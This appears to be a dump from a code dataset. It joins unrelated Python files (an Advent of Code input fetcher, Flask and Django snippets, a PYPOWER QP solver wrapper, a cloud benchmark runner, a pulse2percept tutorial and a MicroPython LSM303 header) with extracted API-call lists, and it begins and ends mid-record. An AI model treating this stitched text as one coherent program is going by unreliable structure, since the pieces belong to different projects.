[((1014, 1025), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (1023, 1025), False, 'import os\n'), ((365, 395), 'sys.path.insert', 'sys.path.insert', (['(0)', 'cmd_folder'], {}), '(0, cmd_folder)\n', (380, 395), False, 'import sys\n'), ((629, 662), 'sys.path.insert', 'sys.path.insert', (['(0)', 'cmd_subfolder'], {}), '(0, cmd_subfolder)\n', (644, 662), False, 'import sys\n'), ((1337, 1388), 'sublime_plugin.WindowCommand.__init__', 'sublime_plugin.WindowCommand.__init__', (['self', 'window'], {}), '(self, window)\n', (1374, 1388), False, 'import sublime_plugin\n'), ((1483, 1540), 'sublime.load_settings', 'sublime.load_settings', (['"""SearchInProject.sublime-settings"""'], {}), "('SearchInProject.sublime-settings')\n", (1504, 1540), False, 'import sublime\n'), ((1630, 1641), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (1639, 1641), False, 'import os\n'), ((1650, 1667), 'os.chdir', 'os.chdir', (['basedir'], {}), '(basedir)\n', (1658, 1667), False, 'import os\n'), ((1825, 1840), 'os.chdir', 'os.chdir', (['pushd'], {}), '(pushd)\n', (1833, 1840), False, 'import os\n'), ((5152, 5169), 'collections.defaultdict', 'defaultdict', (['list'], {}), '(list)\n', (5163, 5169), False, 'from collections import defaultdict\n'), ((6150, 6170), 'sublime.Region', 'sublime.Region', (['(0)', '(0)'], {}), '(0, 0)\n', (6164, 6170), False, 'import sublime\n'), ((2840, 2876), 'sublime.message_dialog', 'sublime.message_dialog', (['"""No results"""'], {}), "('No results')\n", (2862, 2876), False, 'import sublime\n'), ((3701, 3724), 'sublime.active_window', 'sublime.active_window', ([], {}), '()\n', (3722, 3724), False, 'import sublime\n'), ((300, 322), 'inspect.currentframe', 'inspect.currentframe', ([], {}), '()\n', (320, 322), False, 'import inspect\n'), ((4169, 4194), 'os.path.dirname', 'os.path.dirname', (['filename'], {}), '(filename)\n', (4184, 4194), False, 'import os\n'), ((4248, 4271), 'os.path.expanduser', 'os.path.expanduser', (['"""~"""'], {}), "('~')\n", (4266, 4271), False, 'import os\n'), ((547, 569), 'inspect.currentframe', 'inspect.currentframe', ([], {}), '()\n', (567, 569), False, 'import inspect\n')]
|
import pathlib
import requests
class InputManager:
def __init__(self, year: int, day: int):
self.year = year
self.day = day
self.cache_dir = pathlib.Path(".aoc_cache")
self.cache_dir.mkdir(exist_ok=True)
self.cache_file = self.cache_dir / f"{year}-{day:02}.txt"
def create_input_file(self) -> None:
if self.cache_file.exists():
print(f"Using cached input file: ./{self.cache_file}")
data = self.cache_file.read_text()
else:
print("Fetching input file from adventofcode.com!")
data = self.__make_request()
self.cache_file.write_text(data)
pathlib.Path("input.txt").write_text(data)
def __make_request(self) -> str:
session_cookie = pathlib.Path(".env").read_text().strip()
session_header = {"Cookie": f"session={session_cookie}"}
url = f"https://adventofcode.com/{self.year}/day/{self.day}/input"
return requests.get(url, headers=session_header).text
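# Minimal usage sketch (hypothetical puzzle date; expects a session cookie in ./.env):
#   InputManager(2021, 1).create_input_file()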
|
[
"pathlib.Path",
"requests.get"
] |
[((173, 199), 'pathlib.Path', 'pathlib.Path', (['""".aoc_cache"""'], {}), "('.aoc_cache')\n", (185, 199), False, 'import pathlib\n'), ((980, 1021), 'requests.get', 'requests.get', (['url'], {'headers': 'session_header'}), '(url, headers=session_header)\n', (992, 1021), False, 'import requests\n'), ((677, 702), 'pathlib.Path', 'pathlib.Path', (['"""input.txt"""'], {}), "('input.txt')\n", (689, 702), False, 'import pathlib\n'), ((783, 803), 'pathlib.Path', 'pathlib.Path', (['""".env"""'], {}), "('.env')\n", (795, 803), False, 'import pathlib\n')]
|
from flask_user import UserManager
from .create_app import (
app,
db
)
from .user_app import (
user_blueprint,
User,
Role,
UsersRoles
)
from .auth_app import auth_blueprint
from .dashboard_app import dashboard_blueprint
from .wisata_app import wisata_blueprint
from .loader import *
user_manager = UserManager(app, db, User)
app.register_blueprint(user_blueprint)
app.register_blueprint(auth_blueprint)
app.register_blueprint(dashboard_blueprint)
app.register_blueprint(wisata_blueprint)
|
[
"flask_user.UserManager"
] |
[((325, 351), 'flask_user.UserManager', 'UserManager', (['app', 'db', 'User'], {}), '(app, db, User)\n', (336, 351), False, 'from flask_user import UserManager\n')]
|
# Generated by Django 2.1.4 on 2019-02-16 18:54
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('finance', '0003_transaction_transaction_date'),
]
operations = [
migrations.AlterModelOptions(
name='transaction',
options={'ordering': ('-created_at',)},
),
migrations.AddField(
model_name='transaction',
name='deleted',
field=models.BooleanField(default=False, help_text='If this transaction will be factored in in reports'),
),
migrations.AlterField(
model_name='transaction',
name='amount',
field=models.DecimalField(blank=True, decimal_places=2, default=0, help_text='Negative amounts indicate expenses, positive indicate income', max_digits=100),
),
migrations.AlterField(
model_name='transaction',
name='tag',
field=models.ForeignKey(help_text='The associated tag, important for grouping similar transactions for better reporting', on_delete=django.db.models.deletion.PROTECT, related_name='transactions', to='finance.Tag'),
),
migrations.AlterField(
model_name='transaction',
name='transaction_date',
field=models.DateTimeField(auto_now_add=True, help_text='Transaction date and time could be set to be different from the date and time of creation of record in the database.'),
),
]
|
[
"django.db.models.ForeignKey",
"django.db.models.BooleanField",
"django.db.models.DecimalField",
"django.db.migrations.AlterModelOptions",
"django.db.models.DateTimeField"
] |
[((278, 371), 'django.db.migrations.AlterModelOptions', 'migrations.AlterModelOptions', ([], {'name': '"""transaction"""', 'options': "{'ordering': ('-created_at',)}"}), "(name='transaction', options={'ordering': (\n '-created_at',)})\n", (306, 371), False, 'from django.db import migrations, models\n'), ((516, 619), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(False)', 'help_text': '"""If this transaction will be factored in in reports"""'}), "(default=False, help_text=\n 'If this transaction will be factored in in reports')\n", (535, 619), False, 'from django.db import migrations, models\n'), ((741, 900), 'django.db.models.DecimalField', 'models.DecimalField', ([], {'blank': '(True)', 'decimal_places': '(2)', 'default': '(0)', 'help_text': '"""Negative amounts indicate expenses, positive indicate income"""', 'max_digits': '(100)'}), "(blank=True, decimal_places=2, default=0, help_text=\n 'Negative amounts indicate expenses, positive indicate income',\n max_digits=100)\n", (760, 900), False, 'from django.db import migrations, models\n'), ((1015, 1237), 'django.db.models.ForeignKey', 'models.ForeignKey', ([], {'help_text': '"""The associated tag, important for grouping similar transactions for better reporting"""', 'on_delete': 'django.db.models.deletion.PROTECT', 'related_name': '"""transactions"""', 'to': '"""finance.Tag"""'}), "(help_text=\n 'The associated tag, important for grouping similar transactions for better reporting'\n , on_delete=django.db.models.deletion.PROTECT, related_name=\n 'transactions', to='finance.Tag')\n", (1032, 1237), False, 'from django.db import migrations, models\n'), ((1359, 1538), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'auto_now_add': '(True)', 'help_text': '"""Transaction date and time could be set to be different from the date and time of creation of record in the database."""'}), "(auto_now_add=True, help_text=\n 'Transaction date and time could be set to be different from the date and time of creation of record in the database.'\n )\n", (1379, 1538), False, 'from django.db import migrations, models\n')]
|
# Copyright (c) 1996-2015 PSERC. All rights reserved.
# Use of this source code is governed by a BSD-style
# license that can be found in the LICENSE file.
"""Quadratic Program Solver for PYPOWER.
"""
import sys
from pandapower.pypower.qps_pips import qps_pips
#from pandapower.pypower.qps_ipopt import qps_ipopt
#from pandapower.pypower.qps_cplex import qps_cplex
#from pandapower.pypower.qps_mosek import qps_mosek
#from pandapower.pypower.qps_gurobi import qps_gurobi
from pandapower.pypower.util import have_fcn
def qps_pypower(H, c=None, A=None, l=None, u=None, xmin=None, xmax=None,
x0=None, opt=None):
"""Quadratic Program Solver for PYPOWER.
A common wrapper function for various QP solvers.
Solves the following QP (quadratic programming) problem::
min 1/2 x'*H*x + c'*x
x
subject to::
l <= A*x <= u (linear constraints)
xmin <= x <= xmax (variable bounds)
Inputs (all optional except C{H}, C{c}, C{A} and C{l}):
- C{H} : matrix (possibly sparse) of quadratic cost coefficients
- C{c} : vector of linear cost coefficients
- C{A, l, u} : define the optional linear constraints. Default
values for the elements of C{l} and C{u} are -Inf and Inf,
respectively.
- C{xmin}, C{xmax} : optional lower and upper bounds on the
C{x} variables, defaults are -Inf and Inf, respectively.
- C{x0} : optional starting value of optimization vector C{x}
- C{opt} : optional options structure with the following fields,
all of which are also optional (default values shown in parentheses)
- C{alg} (0) - determines which solver to use
- 0 = automatic, first available of BPMPD_MEX, CPLEX,
Gurobi, PIPS
- 100 = BPMPD_MEX
- 200 = PIPS, Python Interior Point Solver
pure Python implementation of a primal-dual
interior point method
- 250 = PIPS-sc, a step controlled variant of PIPS
- 300 = Optimization Toolbox, QUADPROG or LINPROG
- 400 = IPOPT
- 500 = CPLEX
- 600 = MOSEK
- 700 = Gurobi
- C{verbose} (0) - controls level of progress output displayed
- 0 = no progress output
- 1 = some progress output
- 2 = verbose progress output
- C{max_it} (0) - maximum number of iterations allowed
- 0 = use algorithm default
- C{bp_opt} - options vector for BP
- C{cplex_opt} - options dict for CPLEX
- C{grb_opt} - options dict for gurobipy
- C{ipopt_opt} - options dict for IPOPT
- C{pips_opt} - options dict for L{qps_pips}
- C{mosek_opt} - options dict for MOSEK
- C{ot_opt} - options dict for QUADPROG/LINPROG
- C{problem} : The inputs can alternatively be supplied in a single
C{problem} dict with fields corresponding to the input arguments
described above: C{H, c, A, l, u, xmin, xmax, x0, opt}
Outputs:
- C{x} : solution vector
- C{f} : final objective function value
- C{exitflag} : exit flag
- 1 = converged
- 0 or negative values = algorithm specific failure codes
- C{output} : output struct with the following fields:
- C{alg} - algorithm code of solver used
- (others) - algorithm specific fields
    - C{lmbda} : dict containing the Lagrange and Kuhn-Tucker
multipliers on the constraints, with fields:
- C{mu_l} - lower (left-hand) limit on linear constraints
- C{mu_u} - upper (right-hand) limit on linear constraints
- C{lower} - lower bound on optimization variables
- C{upper} - upper bound on optimization variables
Example from U{http://www.uc.edu/sashtml/iml/chap8/sect12.htm}:
>>> from numpy import array, zeros, Inf
>>> from scipy.sparse import csr_matrix
>>> H = csr_matrix(array([[1003.1, 4.3, 6.3, 5.9],
... [4.3, 2.2, 2.1, 3.9],
... [6.3, 2.1, 3.5, 4.8],
... [5.9, 3.9, 4.8, 10 ]]))
>>> c = zeros(4)
>>> A = csr_matrix(array([[1, 1, 1, 1 ],
... [0.17, 0.11, 0.10, 0.18]]))
>>> l = array([1, 0.10])
>>> u = array([1, Inf])
>>> xmin = zeros(4)
>>> xmax = None
>>> x0 = array([1, 0, 0, 1])
>>> solution = qps_pips(H, c, A, l, u, xmin, xmax, x0)
>>> round(solution["f"], 11) == 1.09666678128
True
>>> solution["converged"]
True
>>> solution["output"]["iterations"]
10
@author: <NAME> (PSERC Cornell)
"""
if opt is None:
opt = {}
# if x0 is None:
# x0 = array([])
# if xmax is None:
# xmax = array([])
# if xmin is None:
# xmin = array([])
## default options
if 'alg' in opt:
alg = opt['alg']
else:
alg = 0
if 'verbose' in opt:
verbose = opt['verbose']
else:
verbose = 0
##----- call the appropriate solver -----
# if alg == 0 or alg == 200 or alg == 250: ## use MIPS or sc-MIPS
## set up options
if 'pips_opt' in opt:
pips_opt = opt['pips_opt']
else:
pips_opt = {}
if 'max_it' in opt:
pips_opt['max_it'] = opt['max_it']
if alg == 200:
pips_opt['step_control'] = False
else:
pips_opt['step_control'] = True
pips_opt['verbose'] = verbose
## call solver
x, f, eflag, output, lmbda = \
qps_pips(H, c, A, l, u, xmin, xmax, x0, pips_opt)
# elif alg == 400: ## use IPOPT
# x, f, eflag, output, lmbda = \
# qps_ipopt(H, c, A, l, u, xmin, xmax, x0, opt)
# elif alg == 500: ## use CPLEX
# x, f, eflag, output, lmbda = \
# qps_cplex(H, c, A, l, u, xmin, xmax, x0, opt)
# elif alg == 600: ## use MOSEK
# x, f, eflag, output, lmbda = \
# qps_mosek(H, c, A, l, u, xmin, xmax, x0, opt)
# elif 700: ## use Gurobi
# x, f, eflag, output, lmbda = \
# qps_gurobi(H, c, A, l, u, xmin, xmax, x0, opt)
# else:
# print('qps_pypower: {} is not a valid algorithm code\n'.format(alg))
if 'alg' not in output:
output['alg'] = alg
return x, f, eflag, output, lmbda
|
[
"pandapower.pypower.qps_pips.qps_pips"
] |
[((5862, 5911), 'pandapower.pypower.qps_pips.qps_pips', 'qps_pips', (['H', 'c', 'A', 'l', 'u', 'xmin', 'xmax', 'x0', 'pips_opt'], {}), '(H, c, A, l, u, xmin, xmax, x0, pips_opt)\n', (5870, 5911), False, 'from pandapower.pypower.qps_pips import qps_pips\n')]
|
#!/usr/bin/env python
"""
Linux on Hyper-V and Azure Test Code, ver. 1.0.0
Copyright (c) Microsoft Corporation
All rights reserved
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
See the Apache Version 2.0 License for specific language governing
permissions and limitations under the License.
"""
import os
import sys
import copy
import argparse
import logging
import pkgutil
import importlib
from junit_xml import TestSuite, TestCase
import suites
from utils import constants
logging.basicConfig(format='%(asctime)s %(levelname)s: %(message)s',
datefmt='%y/%m/%d %H:%M:%S', level=logging.INFO)
log = logging.getLogger(__name__)
def run(options):
"""
Main point of entry for running benchmark tests.
"""
sys.stdout.flush()
# lookup suites and tests
suite_names = [suite for _, suite, _ in pkgutil.iter_modules(suites.__path__)]
test_names = {}
for suite in suite_names:
test_names[suite] = [test
for test in dir(importlib.import_module('suites.{}'.format(suite)))
if 'test_' in test]
# validate options
parser = argparse.ArgumentParser(description='Run middleware benchmarking tests.')
mandatory_args = parser.add_argument_group('mandatory arguments')
mandatory_args.add_argument(constants.CLI_SUITE_OPT_SH, constants.CLI_SUITE_OPT,
type=str, default='specific',
help='Provide suite to execute. Defaults to "specific" when '
'"--test" arg is used to execute specific tests.'
'Suites available: {}'.format(
[suite for suite in suite_names]))
mandatory_args.add_argument(constants.CLI_TEST_OPT_SH, constants.CLI_TEST_OPT,
type=str, default='all',
help='When using "--suite specific", a test name or a comma '
'separated list of tests must be provided for execution. '
'Tests available: {}'.format(
[test for suite in suite_names
for test in test_names[suite]]))
mandatory_args.add_argument(constants.CLI_PROVIDER_OPT_SH, constants.CLI_PROVIDER_OPT,
type=str, required=True,
help='Service provider to be used e.g. azure/aws/gce.')
mandatory_args.add_argument(constants.CLI_KEYID_OPT_SH, constants.CLI_KEYID_OPT,
type=str, required=True, help='Azure/aws/gce key id.')
mandatory_args.add_argument(constants.CLI_SECRET_OPT_SH, constants.CLI_SECRET_OPT,
type=str, required=True, help='Azure/aws/gce client secret.')
mandatory_args.add_argument(constants.CLI_LOCAL_PATH_OPT_SH, constants.CLI_LOCAL_PATH_OPT,
type=str, required=True, help='Local path for saving data.')
mandatory_args.add_argument(constants.CLI_INST_TYPE_OPT_SH, constants.CLI_INST_TYPE_OPT,
type=str, required=True,
help='Azure/aws/gce instance size e.g. "Standard_DS1".')
mandatory_args.add_argument(constants.CLI_IMAGEID_OPT_SH, constants.CLI_IMAGEID_OPT,
type=str, required=True,
help='Azure/aws/gce image id or os version e.g. '
'"UbuntuServer#16.04.0-LTS".')
mandatory_args.add_argument(constants.CLI_USER_OPT_SH, constants.CLI_USER_OPT,
type=str, required=True, help='Instance login user.')
parser.add_argument(constants.CLI_TOKEN_OPT_SH, constants.CLI_TOKEN_OPT,
type=str, default='', help='GCE refresh token.')
parser.add_argument(constants.CLI_SUBSCRIPTION_OPT_SH, constants.CLI_SUBSCRIPTION_OPT,
type=str, default='', help='Azure subscription id.')
parser.add_argument(constants.CLI_TENANT_OPT_SH, constants.CLI_TENANT_OPT,
type=str, default='', help='Azure tenant id.')
parser.add_argument(constants.CLI_PROJECTID_OPT_SH, constants.CLI_PROJECTID_OPT,
type=str, default='', help='GCE project id.')
parser.add_argument(constants.CLI_REGION_OPT_SH, constants.CLI_REGION_OPT,
type=str, default='', help='Azure/aws/gce region to connect to.')
parser.add_argument(constants.CLI_ZONE_OPT_SH, constants.CLI_ZONE_OPT,
type=str, default='',
help='Aws/gce specific zone where to create resources e.g. us-west1-a.')
parser.add_argument(constants.CLI_SRIOV_OPT_SH, constants.CLI_SRIOV_OPT,
type=str, default='disabled', help='Enabled/disabled SRIOV feature.')
parser.add_argument(constants.CLI_KERNEL_OPT_SH, constants.CLI_KERNEL_OPT,
type=str, default='', help='Kernel to install from localpath.')
parser.add_argument(constants.CLI_OSVHD_OPT_SH, constants.CLI_OSVHD_OPT,
type=str, default='', help='The OS VHD url')
args = parser.parse_args(options)
test_args = copy.deepcopy(vars(args))
current_suite = test_args['suite']
test_args.pop('suite', None)
current_tests = test_args['test']
test_args.pop('test', None)
junit_testcases = []
if current_suite == 'specific':
selected_tests = current_tests.split(',')
all_tests = [t for s in test_names.values() for t in s]
if not all(sel_test in all_tests for sel_test in selected_tests):
raise Exception('Could not validated all the "specific" tests provided. '
'Use "runner.py -h" to list all the currently supported tests.')
log.info('Tests to run: {}'.format(selected_tests))
for test in selected_tests:
log.info('Running test: {}'.format(test))
try:
module = [k for k, v in test_names.items() if test in v][0]
log.info('import module {}'.format(module))
getattr(importlib.import_module('suites.{}'.format(module)), test)(**test_args)
except Exception as e:
log.info(e)
junit_testcase = TestCase(test)
junit_testcase.add_failure_info(e)
junit_testcases.append(junit_testcase)
continue
junit_testcases.append(TestCase(test))
else:
log.info('Suite to run: {}'.format(current_suite))
if not test_names.get(current_suite, None):
raise Exception('Suite {} not defined. Use "runner.py -h" to list all '
'supported suites.'.format(current_suite))
for test in test_names[current_suite]:
if test_args['provider'] == constants.AZURE and\
test_args['sriov'] == constants.ENABLED and test in constants.SYNTHETIC_TESTS:
log.info('Skipping synthetic test: {}, for SRIOV enabled.'.format(test))
continue
elif test_args['provider'] != constants.AZURE and test in constants.AZURE_TESTS:
log.info('Skipping Azure specific test: {}.'.format(test))
continue
elif test_args['provider'] == constants.GCE and test in constants.NOT_GCE_TESTS:
log.info('Skipping GCE specific test: {}.'.format(test))
continue
else:
log.info('Running test: {}'.format(test))
try:
getattr(importlib.import_module('suites.{}'.format(current_suite)),
test)(**test_args)
except Exception as e:
junit_testcase = TestCase(test)
junit_testcase.add_failure_info(e)
junit_testcases.append(junit_testcase)
continue
junit_testcases.append(TestCase(test))
# generate junit xml
junit_suite = [TestSuite(current_suite, junit_testcases)]
with open(os.path.join(test_args['localpath'], 'junit_{}.xml'.format(current_suite)),
mode='w') as f:
TestSuite.to_file(f, junit_suite, prettyprint=False)
if __name__ == "__main__":
# argv[0] is the script name with the OS location dependent
run(sys.argv[1:])
|
[
"argparse.ArgumentParser",
"logging.basicConfig",
"junit_xml.TestCase",
"pkgutil.iter_modules",
"sys.stdout.flush",
"junit_xml.TestSuite.to_file",
"junit_xml.TestSuite",
"logging.getLogger"
] |
[((958, 1079), 'logging.basicConfig', 'logging.basicConfig', ([], {'format': '"""%(asctime)s %(levelname)s: %(message)s"""', 'datefmt': '"""%y/%m/%d %H:%M:%S"""', 'level': 'logging.INFO'}), "(format='%(asctime)s %(levelname)s: %(message)s',\n datefmt='%y/%m/%d %H:%M:%S', level=logging.INFO)\n", (977, 1079), False, 'import logging\n'), ((1102, 1129), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (1119, 1129), False, 'import logging\n'), ((1223, 1241), 'sys.stdout.flush', 'sys.stdout.flush', ([], {}), '()\n', (1239, 1241), False, 'import sys\n'), ((1621, 1694), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Run middleware benchmarking tests."""'}), "(description='Run middleware benchmarking tests.')\n", (1644, 1694), False, 'import argparse\n'), ((8608, 8649), 'junit_xml.TestSuite', 'TestSuite', (['current_suite', 'junit_testcases'], {}), '(current_suite, junit_testcases)\n', (8617, 8649), False, 'from junit_xml import TestSuite, TestCase\n'), ((8779, 8831), 'junit_xml.TestSuite.to_file', 'TestSuite.to_file', (['f', 'junit_suite'], {'prettyprint': '(False)'}), '(f, junit_suite, prettyprint=False)\n', (8796, 8831), False, 'from junit_xml import TestSuite, TestCase\n'), ((1316, 1353), 'pkgutil.iter_modules', 'pkgutil.iter_modules', (['suites.__path__'], {}), '(suites.__path__)\n', (1336, 1353), False, 'import pkgutil\n'), ((7081, 7095), 'junit_xml.TestCase', 'TestCase', (['test'], {}), '(test)\n', (7089, 7095), False, 'from junit_xml import TestSuite, TestCase\n'), ((8547, 8561), 'junit_xml.TestCase', 'TestCase', (['test'], {}), '(test)\n', (8555, 8561), False, 'from junit_xml import TestSuite, TestCase\n'), ((6900, 6914), 'junit_xml.TestCase', 'TestCase', (['test'], {}), '(test)\n', (6908, 6914), False, 'from junit_xml import TestSuite, TestCase\n'), ((8366, 8380), 'junit_xml.TestCase', 'TestCase', (['test'], {}), '(test)\n', (8374, 8380), False, 'from junit_xml import TestSuite, TestCase\n')]
|
from django.urls import path
from django.conf.urls import url
from coach import views
urlpatterns = [
path(
route = 'new',
view = views.CreateCoachView.as_view(),
name = 'create'
),
path(
route = 'feed',
view = views.CoachFeedView.as_view(),
name = 'feed'
),
path(
route = 'edit/<pk>',
view = views.EditCoachView.as_view(),
name = 'edit'
),
path(
route = '<pk>/delete/',
view = views.CoachDeleteView.as_view(),
name = 'delete'
)
]
|
[
"coach.views.CoachFeedView.as_view",
"coach.views.CreateCoachView.as_view",
"coach.views.EditCoachView.as_view",
"coach.views.CoachDeleteView.as_view"
] |
[((152, 183), 'coach.views.CreateCoachView.as_view', 'views.CreateCoachView.as_view', ([], {}), '()\n', (181, 183), False, 'from coach import views\n'), ((266, 295), 'coach.views.CoachFeedView.as_view', 'views.CoachFeedView.as_view', ([], {}), '()\n', (293, 295), False, 'from coach import views\n'), ((381, 410), 'coach.views.EditCoachView.as_view', 'views.EditCoachView.as_view', ([], {}), '()\n', (408, 410), False, 'from coach import views\n'), ((498, 529), 'coach.views.CoachDeleteView.as_view', 'views.CoachDeleteView.as_view', ([], {}), '()\n', (527, 529), False, 'from coach import views\n')]
|
# -*- coding: utf-8 -*-
"""
===============================================================================
Generating pulse trains
===============================================================================
This example shows how to use :py:class:`~pulse2percept.stimuli.PulseTrain`
and its variants.
Biphasic pulse trains
---------------------
A series of biphasic pulses can be created with the
:py:class:`~pulse2percept.stimuli.BiphasicPulseTrain` class.
You have the same options as when setting up a single
:py:class:`~pulse2percept.stimuli.BiphasicPulse`, in addition to specifying
a pulse train frequency (``freq``) and total stimulus duration (``stim_dur``).
For example, a 20 Hz pulse train lasting 200 ms and made from anodic-first
biphasic pulses (30 uA, 2 ms pulse duration, no interphase gap) can be
created as follows:
"""
# sphinx_gallery_thumbnail_number = 4
from pulse2percept.stimuli import BiphasicPulseTrain
pt = BiphasicPulseTrain(20, 30, 2, stim_dur=200, cathodic_first=False)
pt.plot()
###############################################################################
# You can also limit the number of pulses in the train, but still make the
# stimulus last 200 ms:
pt = BiphasicPulseTrain(20, 30, 2, n_pulses=3, stim_dur=200,
cathodic_first=False)
pt.plot()
###############################################################################
# Asymmetric biphasic pulse trains
# --------------------------------
#
# To create a 20 Hz pulse train lasting 200 ms created from asymmetric biphasic
# pulses, use :py:class:`~pulse2percept.stimuli.AsymmetricBiphasicPulseTrain`:
from pulse2percept.stimuli import AsymmetricBiphasicPulseTrain
# First pulse:
amp1 = 10
phase_dur1 = 2
# Second pulse
amp2 = 2
phase_dur2 = 10
pt = AsymmetricBiphasicPulseTrain(20, amp1, amp2, phase_dur1, phase_dur2,
stim_dur=200)
pt.plot()
###############################################################################
# Biphasic triplet trains
# -----------------------
#
# To create a train of pulse triplets, use
# :py:class:`~pulse2percept.stimuli.BiphasicTripletTrain`:
from pulse2percept.stimuli import BiphasicTripletTrain
amp = 15
phase_dur = 2
pt = BiphasicTripletTrain(20, amp, phase_dur, stim_dur=200)
pt.plot()
###############################################################################
# Generic pulse trains
# --------------------
#
# Finally, you can concatenate any :py:class:`~pulse2percept.stimuli.Stimulus`
# object into a pulse train.
#
# For example, let's define a single ramp stimulus:
import numpy as np
from pulse2percept.stimuli import Stimulus, PulseTrain
# Single ramp:
dt = 1e-3
ramp = Stimulus([[0, 0, 1, 1, 2, 2, 0, 0]],
time=[0, 1, 1 + dt, 2, 2 + dt, 3, 3 + dt, 5 - dt])
ramp.plot()
# Ramp train:
PulseTrain(20, ramp, stim_dur=200).plot()
# Biphasic ramp:
biphasic_ramp = Stimulus(np.concatenate((ramp.data, -ramp.data), axis=1),
time=np.concatenate((ramp.time, ramp.time + 5)))
biphasic_ramp.plot()
# Biphasic ramp train:
PulseTrain(20, biphasic_ramp, stim_dur=200).plot()
|
[
"pulse2percept.stimuli.BiphasicTripletTrain",
"pulse2percept.stimuli.BiphasicPulseTrain",
"pulse2percept.stimuli.PulseTrain",
"pulse2percept.stimuli.Stimulus",
"pulse2percept.stimuli.AsymmetricBiphasicPulseTrain",
"numpy.concatenate"
] |
[((945, 1010), 'pulse2percept.stimuli.BiphasicPulseTrain', 'BiphasicPulseTrain', (['(20)', '(30)', '(2)'], {'stim_dur': '(200)', 'cathodic_first': '(False)'}), '(20, 30, 2, stim_dur=200, cathodic_first=False)\n', (963, 1010), False, 'from pulse2percept.stimuli import BiphasicPulseTrain\n'), ((1207, 1284), 'pulse2percept.stimuli.BiphasicPulseTrain', 'BiphasicPulseTrain', (['(20)', '(30)', '(2)'], {'n_pulses': '(3)', 'stim_dur': '(200)', 'cathodic_first': '(False)'}), '(20, 30, 2, n_pulses=3, stim_dur=200, cathodic_first=False)\n', (1225, 1284), False, 'from pulse2percept.stimuli import BiphasicPulseTrain\n'), ((1783, 1869), 'pulse2percept.stimuli.AsymmetricBiphasicPulseTrain', 'AsymmetricBiphasicPulseTrain', (['(20)', 'amp1', 'amp2', 'phase_dur1', 'phase_dur2'], {'stim_dur': '(200)'}), '(20, amp1, amp2, phase_dur1, phase_dur2,\n stim_dur=200)\n', (1811, 1869), False, 'from pulse2percept.stimuli import AsymmetricBiphasicPulseTrain\n'), ((2233, 2287), 'pulse2percept.stimuli.BiphasicTripletTrain', 'BiphasicTripletTrain', (['(20)', 'amp', 'phase_dur'], {'stim_dur': '(200)'}), '(20, amp, phase_dur, stim_dur=200)\n', (2253, 2287), False, 'from pulse2percept.stimuli import BiphasicTripletTrain\n'), ((2697, 2788), 'pulse2percept.stimuli.Stimulus', 'Stimulus', (['[[0, 0, 1, 1, 2, 2, 0, 0]]'], {'time': '[0, 1, 1 + dt, 2, 2 + dt, 3, 3 + dt, 5 - dt]'}), '([[0, 0, 1, 1, 2, 2, 0, 0]], time=[0, 1, 1 + dt, 2, 2 + dt, 3, 3 +\n dt, 5 - dt])\n', (2705, 2788), False, 'from pulse2percept.stimuli import Stimulus, PulseTrain\n'), ((2913, 2960), 'numpy.concatenate', 'np.concatenate', (['(ramp.data, -ramp.data)'], {'axis': '(1)'}), '((ramp.data, -ramp.data), axis=1)\n', (2927, 2960), True, 'import numpy as np\n'), ((2828, 2862), 'pulse2percept.stimuli.PulseTrain', 'PulseTrain', (['(20)', 'ramp'], {'stim_dur': '(200)'}), '(20, ramp, stim_dur=200)\n', (2838, 2862), False, 'from pulse2percept.stimuli import Stimulus, PulseTrain\n'), ((2992, 3034), 'numpy.concatenate', 'np.concatenate', (['(ramp.time, ramp.time + 5)'], {}), '((ramp.time, ramp.time + 5))\n', (3006, 3034), True, 'import numpy as np\n'), ((3081, 3124), 'pulse2percept.stimuli.PulseTrain', 'PulseTrain', (['(20)', 'biphasic_ramp'], {'stim_dur': '(200)'}), '(20, biphasic_ramp, stim_dur=200)\n', (3091, 3124), False, 'from pulse2percept.stimuli import Stimulus, PulseTrain\n')]
|
"""
lsm303-python // Python library for the LSM303D I2C accelerometer/magnetometer
This file is part of lsm303-python.
[https://github.com/jackw01/lsm303-python]
MIT License
Copyright (c) 2020 <NAME>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
# MODIFIED: imports
#import smbus
#import struct
from ustruct import unpack
#import time
from micropython import const
# MODIFIED ALL: const()
# MODIFIED: 0x19 -> 0x18 ... because of the non-genuine chip maybe
LSM303_ADDRESS_ACCEL = const(0x18) # 0011000x
LSM303_REGISTER_ACCEL_CTRL_REG1_A = const(0x20)
"""
LSM303_REGISTER_ACCEL_CTRL_REG2_A = const(0x21)
LSM303_REGISTER_ACCEL_CTRL_REG3_A = const(0x22)
"""
LSM303_REGISTER_ACCEL_CTRL_REG4_A = const(0x23)
"""
LSM303_REGISTER_ACCEL_CTRL_REG5_A = const(0x24)
LSM303_REGISTER_ACCEL_CTRL_REG6_A = const(0x25)
LSM303_REGISTER_ACCEL_REFERENCE_A = const(0x26)
